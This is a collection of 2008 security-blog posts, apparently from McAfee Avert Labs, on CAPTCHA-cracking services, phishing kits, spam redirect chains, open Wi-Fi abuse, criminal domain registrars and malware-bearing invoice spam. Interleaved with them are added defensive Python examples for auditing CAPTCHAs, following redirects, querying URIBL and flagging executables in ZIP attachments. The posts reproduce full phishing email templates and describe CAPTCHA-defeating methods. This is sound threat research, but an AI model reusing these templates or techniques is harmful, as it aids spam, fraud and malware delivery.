    Also on Thursday, the Dmitri Alperovitch talk grabbed my attention, and I did not hesitate to congratulate him after his presentation. The subject was “Organized Online Criminal Enterprises: Profile of Who, Where, and How.” Alperovitch offered an impressive list of criminals from Eastern countries (with supporting photos) involved in all sorts of cybercrime. It is easy to understand why the Alperovitch presentation now available on the Internet has many deleted sections. Seemingly, the crooks are all Russian or Ukrainian; and of course they use WebMoney. His example of stock manipulation was also very explicit. With some professional spammer tools and an Internet application able to manage “Exact Buy/Sell signals,” Alperovitch demonstrated that it is not difficult for a crook to make money. In his example, the “buy” flag for a particular penny stock was fixed to $3.45 and the “sell” flag was set between $3.90 and $3.95. When the spammer launched his campaign, the stock cost about $3. The whole deal took just 8 hours, from purchase to sale. By manipulating 100,000 shares, the profit reached $50,000.

    Now I am heading home to France preparing to inform my family about all the interesting and festive events I saw. See you next year at FOCUS’09!

    French President a Victim of Identity Theft

    I am in Las Vegas for the McAfee Focus ’08 conference, and I just heard that French President Nicolas Sarkozy suffered, in September, a case of online bank fraud on one of his personal accounts.

    Authorities said hackers were not aware of the identity of the owner of the account. We know only that they removed small amounts of money (an anonymous well-informed source told Agence France Press it was for opening mobile phone accounts). Perhaps by taking small amounts the crooks wished to ensure the validity of the stolen information and wished to verify the victim’s lack of concern. But they couldn’t have picked a worse target. The entire French police force is chasing them.

    It is difficult to imagine my president as victim of phishing, but anybody can be attacked by crimeware while browsing the Internet via a not well protected computer. Remember, it is not necessary to visit inappropriate web sites to catch malware. In December 2007, for example, I explained in this blog that the site of the French embassy in Libya was affected by an IFRAME injection.

    The most probable origin of Sarkozy’s identity theft is “carding.” As I wrote in May, dump tracks lists are for sale by the thousands, and many hacked credit card readers are on the market. Perhaps one of them involved Sarkozy’s credit card during one of his numerous foreign travels.

    Relating to this fraud, Luc Chatel, secretary of state for consumer affairs, said there has been a 9 percent increase in Internet banking crimes this year in France.

    McAfee Security Journal Released!

    Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

    The Origins of Social Engineering
    Social Engineering 2.0 – What’s Next?
    Vulnerabilities in the Equities Markets
    The Future of Social Networking Sites
    Typosquatting – Unintended Adventures in Browsing

    Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

    Available here.

    Cracking CAPTCHA: Another Russian Business

    We’ve already written about CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), the mechanism used to protect web sites, forums, and mailing systems against the automatic creation of accounts and contents. As my colleague Tad Heppner wrote in his November 2007 post, most common CAPTCHA systems work by generating distorted characters, text, or pictures that can be easily recognized by the human brain but present significant difficulty for computer-based optical character recognition or other image-recognition systems.

    It should come as no surprise, however, that spammers continue to try to crack CAPTCHA. We’ve now seen a new version of a professional spammer tool on the web. XRumer 5 sells for $520 and promises advanced CAPTCHA decoding methods.

    For a long time spammers have searched to defeat CAPTCHA mechanisms to create fake email accounts to send spam. Before telling you more about this new crooked utility, let’s review some older techniques used by spammers.

    As shown in the following image (source XMCO), the most common CAPTCHA methods can be broken.

    The first method of cracking is manual. People from developing countries offer services. The competition is intense. On some dedicated forums, proposals surge in from Vietnam or Bangladesh. They claim that lots of people are ready to work 24 hours a day to process hundreds of thousands of CAPTCHAs. Rates vary from $8 to $1 per 1,000 CAPTCHAs.

    A less expensive solution consists of using private individuals to do the work free of charge. I am sure some readers remember this unusual offer, in which it was possible to undress “Melissa” in exchange for some CAPTCHA work. This allowed a spammer to create fake Yahoo Mail accounts.

    It is also possible to find free web services. The CAPTCHA Killer web site offers such services. Its designer claims the offer “is 100% focused on increasing accessibility on the Internet” for the “1 Million Americans that suffer from blindness.” The service makes available an API to automate the process. However, I was not surprised to read a cross-reference on that site saying they have been notified that using CAPTCHA Killer with Myspace was against the latter’s Terms of Service.

    A very technical approach uses rainbow tables, in which each CAPTCHA image is associated with its character string. In March 2008, someone nicknamed Maluc created PHP scripts to download, extract, and save thousands of CAPTCHA images from Yahoo, Google, and Hotmail. When finished, each collection will help spammers create new recognition tables or verify the accuracy of their OCR algorithm. When successful, only one millisecond is needed to compare a new footprint with the ones included in the database. You have to pay between $1,500 and $5,000 for such algorithms, which suppress the noise, create a black-and-white picture, break it into segments (one letter per segment), and identify the character.

    A programmer called Wangrun in the Chinese province of Anhui says he developed software to decode CAPTCHA systems. Depending on the complexity of the CAPTCHA image, he charges between $500 and $6,000 per decoder. No price is quoted for the most difficult images but, in a comment, he writes it is feasible. Wangrun declines to say what his customers use the decoders for, but says he has “very many” of them.

    Spammers can also use zombie machines to help them crack CAPTCHA. We’ve read on the Virus Bulletin web site that compromised systems making up a large botnet were recently used to help in the registration process for Windows Live Mail accounts. When the bot (detected by VirusScan as Generix.dx) asked for registration, it received a CAPTCHA and immediately presented its image to a central server that attempted to decode it and returned the result. The decipher technique was successful only around 35 percent of the time, VB said, but a new idea was launched. The fact that large numbers of infected systems were running repeated attempts suggests a high number of new accounts for spamming were created at that time.

    Finally, turnkey tools are another method for defeating CAPTCHA defenses. XRumer 5 is one of them. It can flood forums, guestbooks, blogs, wikis, etc., with messages and links. It automatically finds and fills in required fields with no need of a browser. If the forum requires registration, the program will register, log in, and post the spammer’s text. XRumer goes beyond JavaScript protection, pictocode protection (typing a number displayed in a box), and protection by e-mail activation. If a CAPTCHA image is detected, the program automatically downloads it, analyzes it, and fills in the form.

    Version 5 can work on most recent versions of popular engines such as VBulletin, IPB, and phpBB, according to its creator. XRumer can also create accounts on gmail.com for posting. And its clients seem happy. One of them wrote last week on a forum “all that for only $500? It’s very cheap! I’d easily charge 2k for that. Solving gmail captcha is no joke. I paid 4k just for that from an OCR developer. …”

    XRumer is also able to solve the “pick the cat” CAPTCHAs presented in the picture below.

    On October 3, XRumer’s maker explained he analyzed many forums and discovered that most of this type of CAPTCHA used identical pictures. Thus XRumer can distinguish them by their sizes in bytes. And he concludes: “It’s so easy, isn’t it? Oh, they can make some distortion on images? Well, we have a time to improve our algorithm. We analyze forums, blogs, guestbooks permanently, and there is one important thing: that type of captchas used not more than 0,01% of resources (1 of 10,000 sites).”
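The rainbow-table paragraph and the byte-size trick above share one root cause: a fixed pool of image bytes is a lookup table waiting to be built. As an added example (not from the post, and not XRumer’s code), here is a way to audit your own image-choice CAPTCHA for that weakness; the four-label toy pool, the minimal PNG encoder, and the `serve_static`/`serve_noisy` functions are all constructed for this illustration.

```python
"""Audit a 'pick the cat' style CAPTCHA for fixed-image reuse.

Added example, not from the post. Constructed toy CAPTCHA: a pool of four
tiny grayscale PNGs (stdlib-only encoder). If identical bytes are served
every time, a table of (byte size, hash) -> label answers every challenge;
per-request pixel noise defeats that exact-match table (and only that).
"""
import hashlib
import random
import struct
import zlib

SIZE = 16  # constructed toy images are 16x16, 8-bit grayscale


def _chunk(tag: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def encode_png(rows):
    """Minimal PNG encoder: list of rows of 0..255 gray values -> PNG bytes."""
    h, w = len(rows), len(rows[0])
    raw = b"".join(b"\x00" + bytes(r) for r in rows)  # filter type 0 per scanline
    ihdr = struct.pack(">IIBBBBB", w, h, 8, 0, 0, 0, 0)  # 8-bit, colour type 0 (gray)
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def make_pool(seed=1):
    """Constructed pool: one fixed image per label, differing in texture."""
    rng = random.Random(seed)
    pool = {}
    for label, noise_px in (("cat", 0), ("dog", 40), ("fish", 120), ("bird", 256)):
        rows = [[0] * SIZE for _ in range(SIZE)]
        for _ in range(noise_px):
            rows[rng.randrange(SIZE)][rng.randrange(SIZE)] = rng.randrange(256)
        pool[label] = rows
    return pool


def fingerprint(png: bytes):
    """What a lookup table keys on: byte size plus an exact hash."""
    return (len(png), hashlib.sha256(png).hexdigest())


def serve_static(pool, rng):
    """Weak server: the identical bytes for a label every time."""
    label = rng.choice(sorted(pool))
    return label, encode_png(pool[label])


def serve_noisy(pool, rng, flips=24):
    """Mitigation: perturb a few random pixels per request before encoding."""
    label = rng.choice(sorted(pool))
    rows = [r[:] for r in pool[label]]
    for _ in range(flips):
        y, x = rng.randrange(SIZE), rng.randrange(SIZE)
        rows[y][x] = (rows[y][x] + rng.randrange(1, 9)) % 256
    return label, encode_png(rows)


def audit(serve, pool, samples=200, seed=7):
    """Build a lookup table from `samples` labelled challenges, then measure how
    many fresh challenges it answers exactly, and how many by byte size alone."""
    rng = random.Random(seed)
    table = {}    # (size, sha256) -> label
    by_size = {}  # size -> set of labels seen with that size
    for _ in range(samples):
        label, png = serve(pool, rng)
        fp = fingerprint(png)
        table[fp] = label
        by_size.setdefault(fp[0], set()).add(label)
    exact = size_only = 0
    for _ in range(samples):
        label, png = serve(pool, rng)
        fp = fingerprint(png)
        exact += table.get(fp) == label
        size_only += by_size.get(fp[0]) == {label}
    return {
        "distinct_images": len(table),
        "exact_hit_rate": exact / samples,
        "size_only_hit_rate": size_only / samples,
    }


if __name__ == "__main__":
    pool = make_pool()
    print("static pool:", audit(serve_static, pool))
    print("noisy pool: ", audit(serve_noisy, pool))
```

Pixel noise only breaks the exact size/hash table the post describes; a solver comparing downscaled or perceptual features would still need stronger per-request distortion, which is what the `distinct_images` count is there to keep honest.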

    Once again, we are reminded that malware design is a business. And once again, my searches drive me to Russia, where criminals create and employ malicious software as well as engage in identity theft and virtual prostitution. The company or individual behind XRumer appears to be the same as that which proposed an automated sex-talk service called CyberLover.ru in 2007. One name I got from a whois request today is Alexander Ryabchenko. When the media pointed the finger at him in 2007, Ryabchenko emailed to Reuters that he could not be accused of identity theft with the CyberLover concept. He explained “the program can find no more information than the user is prepared to provide.”

    If anyone should ask Ryabchenko why he commercializes XRumer, I suggest he repeat the CAPTCHA Killer web site argument: to help the million people suffering from blindness.

    Loss Leaders in Phishing

    Q: How do you want to build a client base for your phishing kits?
    A: Give the popular ones away for free. Yes FREE, and as blatantly as possible, with one-click satisfaction, right on the homepage of a web site.

    scam site

    I suspect that this is a shareware-style, lead-generation setup–as the phishing kits appear to be of relatively poor quality. (So poor in fact that I expect the most experienced brands to be sending takedown notices for them before the phishing emails were actually sent.) Some of the kits also appear to have encoded parts indicative of being backdoored, too–I guess they gotta pay the hosting bill somehow!

    Kudos to the host in Germany for taking down the site next day; you know who you are. ;)

    There is an interesting back story to this incident, too: All roads of further investigation lead back to France. The details of which have been with the national police for some time now (thus the delay in posting).

    From Torrents to Casinos, Redirect Chaining Is Back in Fashion

    The casino spammers have been chaining together a lot of link redirectors recently to avoid being taken down by redirector sites checking anti-spam blacklists.

    Here is a good example from one of our partner traps of how you go from one of the most popular torrent forums on the web to a Malta-based casino in one click.

    This is the URL used in the email and our starting point:
    http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h

    Here is the redirection chain:
    http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
    --> 301 Moved Permanently

    http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
    --> 200 OK
    (and stops if you’re using LWP)

    HEADER : Refresh: 0;url=http://tinyurl.com/4nr46h

    GET http://tinyurl.com/4nr46h
    --> 301 Moved Permanently

    GET http://blog.com/redirect/?url=http://maltytotrough.com?6ccbe5z5p
    --> 302 Found

    GET http://maltytotrough.com?6ccbe5z5p
    --> 302 Found

    GET http://www.spinpalace.com/index.asp?a=634991
    --> 301 Moved Permanently

    (then they hide the affiliate string for some reason)

    GET http://www.spinpalace.com/
    --> 200 OK

    Affiliate 634991, your time is up. ;)

    This is not a new trick. Forward-thinking anti-spammers have been reputing against this type of behavior for quite a while, coupled with generic redirector detection. (This mail was three times over our usual deletion threshold.) The issue lies in the fact that some of these links stay alive for days, as it takes a long time and a lot of effort for the redirect sites to clean up the working redirectors. Spammers don’t re-try tricks like this without reason, however.
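An added example (not from the original post) of how a trap or filter can walk a chain like the one above: it follows Location headers and also the `Refresh:` header that stops LWP, caps the hop count, detects loops, and lists the redirector hosts in between as input for generic redirector reputation. `fetch` is a hypothetical callable you would replace with a real HTTP client; `RESPONSES` is a constructed offline table reproducing the chain in the post.

```python
"""Walk a spam redirect chain, including the Refresh header that stops LWP.

Added example, not from the original post. `fetch(url)` is a hypothetical
callable returning (status, headers, body); RESPONSES below is a constructed
offline table that reproduces the chain shown in the post, so the walk runs
without network access.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

Response = Tuple[int, Dict[str, str], str]
Fetcher = Callable[[str], Response]

# "0;url=http://..." as sent in a Refresh header or a <meta http-equiv> content.
REFRESH_RE = re.compile(r'^\s*\d+\s*;\s*url\s*=\s*["\']?(.+?)["\']?\s*$', re.IGNORECASE)
META_REFRESH_RE = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']+)',
    re.IGNORECASE,
)


def next_hop(url: str, status: int, headers: Dict[str, str], body: str) -> Optional[str]:
    """Return the next URL in the chain, or None when this is the landing page."""
    h = {k.lower(): v for k, v in headers.items()}
    if status in (301, 302, 303, 307, 308) and "location" in h:
        return urljoin(url, h["location"])
    if status == 200:
        # Header-based refresh (what demonoid's redirect.php used), then <meta>.
        m = REFRESH_RE.match(h.get("refresh", ""))
        if not m:
            meta = META_REFRESH_RE.search(body)
            m = REFRESH_RE.match(meta.group(1)) if meta else None
        if m:
            return urljoin(url, m.group(1))
    return None


def follow_chain(start: str, fetch: Fetcher, max_hops: int = 10) -> List[Tuple[str, object]]:
    """Return [(url, status), ...]; stops at the landing page, a loop, or max_hops."""
    hops: List[Tuple[str, object]] = []
    seen = set()
    url: Optional[str] = start
    while url is not None and len(hops) < max_hops:
        if url in seen:
            hops.append((url, "loop"))  # redirector loop: give up, keep the evidence
            break
        seen.add(url)
        status, headers, body = fetch(url)
        hops.append((url, status))
        url = next_hop(url, status, headers, body)
    return hops


def redirector_hosts(hops) -> List[str]:
    """Hosts that merely forwarded the click (ordered, de-duplicated), i.e. the
    generic-redirector evidence a filter reputes against; the landing host is excluded."""
    landing = urlsplit(hops[-1][0]).hostname
    out: List[str] = []
    for url, _ in hops[:-1]:
        host = urlsplit(url).hostname
        if host and host != landing and host not in out:
            out.append(host)
    return out


# Constructed offline table reproducing the chain in the post.
START = "http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h"
RESPONSES: Dict[str, Response] = {
    START: (301, {"Location": "http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h"}, ""),
    "http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h":
        (200, {"Refresh": "0;url=http://tinyurl.com/4nr46h"}, ""),  # LWP stops here
    "http://tinyurl.com/4nr46h":
        (301, {"Location": "http://blog.com/redirect/?url=http://maltytotrough.com?6ccbe5z5p"}, ""),
    "http://blog.com/redirect/?url=http://maltytotrough.com?6ccbe5z5p":
        (302, {"Location": "http://maltytotrough.com?6ccbe5z5p"}, ""),
    "http://maltytotrough.com?6ccbe5z5p":
        (302, {"Location": "http://www.spinpalace.com/index.asp?a=634991"}, ""),
    "http://www.spinpalace.com/index.asp?a=634991": (301, {"Location": "/"}, ""),
    "http://www.spinpalace.com/": (200, {}, "<html>landing page</html>"),
}


def table_fetch(url: str) -> Response:
    return RESPONSES.get(url, (404, {}, ""))


if __name__ == "__main__":
    chain = follow_chain(START, table_fetch)
    for url, status in chain:
        print(status, url)
    print("redirectors:", redirector_hosts(chain))
```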

    If any readers are going to be at MAAWG next week, be sure to say “Hi”!
    (Slacker Ed. is going too!)

    The Perils Of Leaving Wi-Fi Networks Unsecured

    People don’t seem to seriously care about Wi-Fi security yet. In spite of oft-repeated warnings, ignorant folks with unlimited bandwidth plans believe that they are doing a social service by allowing neighbors to leech their Wi-Fi freely. What they fail to understand is that by doing so, they can become an unwitting accessory to cyber crime.

    Instead of scouring for anonymous proxies to stay faceless on the internet, cyber criminals are increasingly targeting unsecured Wi-Fi networks to get the job done. A combination of war driving tools such as NetStumbler along with a listing of default router usernames and passwords is all it takes to freely connect to unsecured Wi-Fi networks. This is especially true since most Wi-Fi routers still use the default security settings preinstalled by the vendor rather than settings configured by the end user.

    SOHO routers log every connection and DHCP lease, but these logs are flushed once the router is rebooted. If an attacker has access to the administrative console of the router (thanks to the default password), once their nefarious activities have been carried out, a simple restart of the router will erase all tracks.

    The extent to which an unsecured Wi-Fi connection can be abused is left purely to the imagination of the attacker. Putting on my Dr. Evil hat, here are a couple of wicked acts a Wi-Fi hacker could commit and get away with undetected using an unsecured network.

    • Download child pornography
    • Download copyrighted movies and music via P2P
    • Download Warez and abuse your bandwidth
    • Send bomb hoaxes, terror or threatening emails.
    • Send spam (sexual aids, pharmacy or money laundering scams)

    Any of the above acts could lead to law enforcement authorities knocking on your door. This is not mere speculation and many unsuspecting people have fallen victim. To quote a high profile example, in the recent serial bomb blasts in India, terror emails that took responsibility for the blasts were sent from unsecured Wi-Fi connections. And it was the unfortunate owners of the unsecured Wi-Fi connection that were subjected to police questioning and house arrest.

    In addition to using an unsecured Wi-Fi network for malicious purposes, an attacker can also use it to steal personal information for identity theft. For example:

    • Infiltrate and break into internal machines
    • Modify DNS settings on the router to point to a rogue server.
    • Sniff Wi-Fi traffic for usernames and passwords

    The scenarios discussed above are neither speculation nor an exhaustive list of the ways an unsecured Wi-Fi network can be abused. They are being enacted by criminals every day around the world.

    Now why would you want to be an unwitting host to criminal activity emanating from your IP address, or make yourself vulnerable to identity theft? Be a responsible Netizen and please secure your Wi-Fi connection now!

    The darkside’s domains

    Inspired by Igor’s post (and whilst Terry is dancing in doorways) I’ve taken some time out from my current project and beaten a path through the tangled web of service providers, registrars, resellers and registrants of the domain name system supporting the darker side of the web.

    This investigation originally started when Garth from Knujon pointed out that Directi have some shill registrars on their books (whilst I was enjoying the Kaiser Chiefs @ Rock en Seine in Paris, no less). I then read Brian Krebs’ post about Atrivo being one of the best-known dangerous networks around… He finished with a teaser note about ESTDomains. So, guessing what’s coming next, I’m going to skip the inter-networking gymnastics that bind EST with Atrivo/Intercage/(cernel|inhoster)/etc., privacy services and others, start at the far end of the story, expose a secret about a not-so-little Indian company called Directi, and shine a light on the almost invisible but vital service that powers the domain registration core of the largest group(s) of bad actors on the web today.

    Let me provide some bullet points about the Directi Group of companies to get you up to speed.

    • Directi are a privately owned Indian company with a reported turnover in excess of $300M USD.
    • Directi own LogicBoxes, the maker of a product used to manage the registrar relationship with registries.
    • Directi own the reseller Resellerclub.com and the registrar Answerable.com, amongst others.
    • Directi own skenzo.com, a domain typo-squatting monetization service.
    • LogicBoxes is responsible for over 3.5M domains and about 45K resellers across 50+ ICANN-accredited registrars.
    • LogicBoxes has no acceptable use policy (AUP) for their service.

    That last point is the weak link in the chain. LogicBoxes provides domain registration automation services under contract but without an AUP, and to organizations with unholy ties to organised crime at that.

    LogicBoxes is a software product or turnkey ASP solution, but some simple tests (that I’m deliberately withholding for now) prove that it’s software combined with a backend service, and that Directi are involved at every stage of the game via its service layer, even though on the face of it it looks like they aren’t.

    (If you don’t understand the cats-cradle of knotted string that holds the domain name registration system together then blame John Levine as he has admitted it’s all his fault and this slide explains it all, “apparently” ;) ).

    So on to the murky world of registrars also being resellers, and why:
    ESTDomains and Dynamic Dolphin, to name but a few, are huge Directi resellers and, as ICANN-accredited registrars, customers of LogicBoxes too. But as Garth’s and Brian’s posts show, there are also many other “shill” registrars and unanswered questions. Between them they provide a disproportionate number of the domains used for illegal activities, and most have a path back to Directi’s LogicBoxes service. I’d estimate the total to be north of 100,000 domains by now, everything from social networking spam through illegal pharmaceutical supply to botnet command and control.

    There is a metric truckload of publicly available evidence for anyone who still doubts the darkness of their hats: take a look at the URIBL listings for the last 5 days for ESTDomains. The linked domains are sites you do not want to click, as they contain spam landing pages, fake anti-malware and porn with fake codecs, amongst other things. Why on earth a legitimate registrar would not monitor URIBL’s published information and act on it is completely beyond me.
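A registrar (or anyone else) can check a domain against URIBL with a plain DNS lookup: append the registrable domain to the multi.uribl.com zone and decode the 127.0.0.X answer. The Python below is an added example, not from the original post or from URIBL: the return-code table follows URIBL’s published documentation for multi.uribl.com (verify it against the current docs before relying on it), the registrable-domain reduction is a deliberate simplification that a real tool would replace with the Public Suffix List, and the resolver is injectable so the decoding logic can be exercised offline. Heavy use of the public mirrors is rate-limited, and 127.0.0.1 signals a refused query, not a listing.

```python
import socket

# Answer bits documented by URIBL for the multi.uribl.com zone
# (127.0.0.2 black, 127.0.0.4 grey, 127.0.0.8 red; combinations are ORed).
URIBL_BITS = {2: "black", 4: "grey", 8: "red"}
URIBL_ZONE = "multi.uribl.com"

# Registrable-domain reduction. Real code should use the Public Suffix List;
# this short table of two-label public suffixes is a deliberate simplification.
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "com.cn", "co.jp", "com.br"}

def registrable_domain(hostname):
    """Strip a hostname down to the domain a registrar actually sold."""
    labels = hostname.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])

def query_name(hostname):
    """The DNS name to resolve: <registrable domain>.multi.uribl.com."""
    return registrable_domain(hostname) + "." + URIBL_ZONE

def decode(answer):
    """Translate a 127.0.0.X answer into the set of URIBL lists it encodes.
    None (NXDOMAIN) means not listed; 127.0.0.1 means the query was refused."""
    if answer is None:
        return set()
    octets = answer.split(".")
    if len(octets) != 4 or octets[:3] != ["127", "0", "0"]:
        raise ValueError("unexpected DNSBL answer: %r" % answer)
    code = int(octets[3])
    if code == 1:
        return {"query-refused"}
    return {name for bit, name in URIBL_BITS.items() if code & bit}

def system_resolver(name):
    """Default resolver: the first A record, or None when the name does not exist."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None

def check(hostname, resolver=system_resolver):
    """Set of URIBL lists the hostname's registrable domain appears on."""
    return decode(resolver(query_name(hostname)))

if __name__ == "__main__":
    import sys
    for host in sys.argv[1:]:
        print(host, sorted(check(host)) or ["not listed"])
```

Run it with hostnames on the command line to use the system resolver; in a test or a batch job, pass your own `resolver` so the lookups go through a local cache or a rsync’d copy of the zone rather than the public mirrors.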

    ICANN don’t help the situation by accrediting registrars without a verifiable legitimate address and well-publicized, working contacts. We have procurement and vendor qualification processes that are a real pain sometimes but excellent IMHO; I’ll ask someone to send them a copy ;)

    Our friends at Spamhaus have plenty to say about ESTDomains too on many listings; take a look at their nameserver listings for starters: SBL53320 and SBL53319. Searching ROKSO will reveal a whole lot more. As for Atrivo, it’s a rat’s nest of issues, a rat’s nest that would do well to fall off the internet. For more information on the internet gymnastics I jumped over, take a look at this great PDF from hostexploit.com. Keep in mind, though, that some of the feeder transit networks may be owned or run by the same gang and exist only for redundancy.

    The ESTDomains registrations that I’ve investigated first-hand have generally fallen into two camps: one where EST is the registrar directly, and one where PublicDomainRegistry is mentioned in the whois, the latter being the “shill”, sorry, I mean “white-labeled registrar”, for the previously mentioned Directi company “resellerclub dot com”. The fact that PrivacyProtect.org is Directi’s whois privacy service (pasted from here) for resellers just makes matters worse.

    Don’t get me wrong, Directi have a clue: register a domain directly with a Directi-owned registrar, break the AUP, and they will act, as any registrar must. I’m specifically talking about the other services they provide to the criminal corners of the web.

    It would appear too that the ESTDomains portfolio has had its privacy protection revoked, which is definitely a step in the right direction (breaking news this evening from El Reg and Knujon; nice work, guys). However, these guys move pretty fast, and EST recently moved their privacy needs to their own protectdetails.com domain.

    So finally I have to ask those making money by providing the core services, Bhavin Turakhia and Divyank Turakhia from Directi: you clearly know the score, so when will you completely stop supporting the illegal acts of EST, DD and other very obvious darkside entities, and kick the bad apples out?

    Before anyone from a registry or registrar starts the classic “Smith & Wesson” rant think about this, “Smith and Wesson” don’t sell maps or cars, drive you to the forest, apply your camouflage, help with your ICANN accreditation or load your gun for you ;)

    Invoice Spam Takes Flight

    Last night we blogged about fake invoice spam carrying malware.  Unsurprisingly those behind the recent attacks continued today with new spam campaigns involving airline ticket invoices.  Messages may appear as follows (other spam campaigns may appear different):

    —————————–
    From:
     [name] [airline_name] Airlines
    Subject: Your order from {airlines} [number]
       or
    Subject: Online order for flight ticket [number]
    Body:

    Hello,
    Thank you for using our new service “Buy airplane ticket Online” on our website.
    Your account has been created:

    Your login: [characters]
    Your password: [characters]

    Your credit card has been charged for $[number in the $400 range]
    We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
    Attached to this message is the purchase Invoice and the flight ticket.
    To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

    Kind regards,
    [name]
    [airline]

    Attachment: E-ticket_[number].zip (containing an executable, which may have a Word document icon).
    —————————–

    As with previous campaigns, the executable is a new variant of Spy-Agent.bw. Once again, Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments or follow unexpected URLs, especially from unfamiliar senders.

    Fake Invoice Spam Carries Malware

    On July 15, we sent out a Security Advisory covering Generic Downloader.ab (MTIS08-131-A). This covered a Trojan variant that was mass-spammed purporting to be a UPS invoice. Since then we’ve seen a number of subsequent mass spammings carrying new variants of Spy-Agent.bw. The email message content is similar to the original spam:

    ———————————-
    From: “United Parcel Service”
    Subject: [RE] UPS Tracking Number [number]
    Body:

    Unfortunately we were not able to deliver postal package you sent on July the 1st in time because the recipient’s address is not correct.
    Please print out the invoice copy attached and collect the package at our office

    Your UPS

    Attachment: UPS_INVOICE_[number].zip or invoice_[number].zip
    ———————————-

    Over the past 24 hours we’ve seen other spam runs from “Customs Service” with the attachment “Tax_invoice.zip”, as well as “Bill_Tax.zip” attachments from “US Customs Service” and “Rechnung.zip” attached to messages with the subject “WG: Lastschrift [number]”. The ZIP attachments contain .EXE files. For infection to occur, users must open the attached ZIP and then choose to run the executable manually.
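Both this campaign and the airline-ticket one above rely on the same trick: a ZIP attachment whose only payload is an executable dressed up as a document. A mail gateway can refuse such attachments before a user ever sees the icon. The Python below is an added example, not Avert Labs code: it builds a constructed ZIP in memory that mimics the campaign, then inspects each member for executable extensions, document-over-executable double extensions, and an MZ header regardless of what the name claims.

```python
import io
import zipfile

EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs",
                   ".js", ".jse", ".wsf", ".hta", ".lnk"}
DOCUMENT_EXTS = {".doc", ".pdf", ".xls", ".txt", ".rtf", ".jpg"}

def make_sample_zip(with_executable=True):
    """Constructed attachment in the shape of the campaign: a ZIP holding a
    'ticket' whose real type is a PE executable. The member is just an 'MZ'
    header plus filler, not a working program."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        if with_executable:
            z.writestr("E-ticket_48213.doc.exe",
                       b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 200)
        z.writestr("readme.txt", b"Thank you for your order.")
    return buf.getvalue()

def inspect_zip(data):
    """Return [(member_name, [reasons])] for members that look executable."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            basename = info.filename.lower().rsplit("/", 1)[-1]
            exts = ["." + p for p in basename.split(".")[1:]]
            reasons = []
            if exts and exts[-1] in EXECUTABLE_EXTS:
                reasons.append("executable extension %s" % exts[-1])
            if (len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS
                    and exts[-1] in EXECUTABLE_EXTS):
                reasons.append("document extension %s masks %s" % (exts[-2], exts[-1]))
            with z.open(info) as f:          # content check: name is not trusted
                head = f.read(2)
            if head == b"MZ":
                reasons.append("PE/MZ header")
                if not exts or exts[-1] not in EXECUTABLE_EXTS:
                    reasons.append("MZ header under non-executable extension")
            if reasons:
                findings.append((info.filename, reasons))
    return findings

def should_block(data):
    """Gateway decision: any executable-looking member blocks the attachment."""
    return bool(inspect_zip(data))

if __name__ == "__main__":
    for member, reasons in inspect_zip(make_sample_zip()):
        print(member, "->", "; ".join(reasons))
```

The content check matters more than the extension list: a file called `invoice.pdf` that starts with `MZ` is still a Windows executable once a user renames or double-clicks it through a helper, and the icon that makes it look like a Word document lives inside the PE, where a name-only filter never looks.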

    Product coverage is being updated for new malware variants as necessary and a follow-up security advisory will be sent soon.

    These spam runs may continue over the next few days. Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments or follow unexpected URLs, especially from unfamiliar senders.

    Ever put your CV on a job site?

    Recent phishing attempts have been targeting popular social networking and jobs websites such as facebook.com and monster.com. Because of the amount of personal and sensitive information saved there, these sites are very valuable to phishers: the data can be used to further target or spear-phish individual victims by name and even by their work interests.

    We have seen phishing attacks which targeted careerbuilder.com in the past. The latest target is another big recruitment site – monster.com. Just like typical financial phishing emails, the Monster phishing emails have subjects including imperatives like “Monster customer service: important notice” or “Monster customer service: please confirm your data!”

    But please do not be fooled! These are not from Monster at all!!

    monster.com phishing site


    The phishing page appears to be hosted on a newly registered UK domain whose DNS resolves to a bot in Turkey. We can see from the phishing site that the phisher is mainly after recruiters’ logins and passwords. These would give access to hundreds or even thousands of job seekers’ CVs, which often contain a gold mine of sensitive data. Other elements of a recruiter’s account could be useful to them as well.

    The level of personal data on a CV is pretty high, and in the wrong hands outright dangerous. Be vigilant against unsolicited emails!

    Nuwar Back to War Games

    Just when you were wondering what the Storm worm authors could come up with next, after using a 4th of July theme as bait for their last spam run, Nuwar has resorted to a war theme. The authors have cleverly chosen to exploit the escalating political tensions in the Middle East between Iran and the United States over Iran’s threat to attack Israel in response to any military action against its nuclear facilities. Some of the subjects observed in today’s spam are:

    The beginning of The World War III
    US Army crossed Iran’s borders
    US Army invaded Iran
    US soldiers occupied Iran
    USA attacked Iran
    USA declares war on Iran
